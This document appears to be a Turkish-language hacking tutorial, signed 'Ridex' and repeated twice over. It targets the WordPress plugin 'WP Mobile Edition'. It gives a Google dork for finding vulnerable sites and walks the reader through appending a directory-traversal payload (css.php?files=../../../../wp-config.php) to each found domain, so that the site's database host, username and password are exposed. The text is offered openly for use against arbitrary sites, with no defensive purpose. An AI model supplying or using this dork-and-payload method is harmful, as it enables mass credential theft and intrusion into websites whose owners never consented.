Exploit Adı: Wordpress Plugin 'WP Mobile Edition'
Exploit Dork: inurl:?fdx_switcher=mobile
Exploit: http://[server]/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php
1- Google arama motorunda mevcut dorkumuzu aratmamız gerekir, "inurl:?fdx_switcher=mobile" dorkumuzu arattıktan sonra ilk sayfalarda istediğinizi bulamayabilirsiniz bu yüzden 3.sayfa itibari ile çalışabilirsiniz..
Aramanız sonucunda çıkan sitelerin url adreslerinde bir değişiklik yapmanız gerekicek.
Domain adresine kadar fazlalığını silin..
www.orneksite.com
www.ornetsite.net
www.orneksite.org
şeklinde kalmalıdır uzantıların devamını silin ve şu exploit'i uygulayın ;
/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php
siteadı.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php
DB bilgileri karşınıza gelicektir ;
DB Host
DB Username
DB Password
// Ridex
Exploit Dork: inurl:?fdx_switcher=mobile
Exploit: http://[server]/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php
1- Google arama motorunda mevcut dorkumuzu aratmamız gerekir, "inurl:?fdx_switcher=mobile" dorkumuzu arattıktan sonra ilk sayfalarda istediğinizi bulamayabilirsiniz bu yüzden 3.sayfa itibari ile çalışabilirsiniz..
Aramanız sonucunda çıkan sitelerin url adreslerinde bir değişiklik yapmanız gerekicek.
Domain adresine kadar fazlalığını silin..
www.orneksite.com
www.ornetsite.net
www.orneksite.org
şeklinde kalmalıdır uzantıların devamını silin ve şu exploit'i uygulayın ;
/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php
siteadı.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php
DB bilgileri karşınıza gelicektir ;
DB Host
DB Username
DB Password
// Ridex
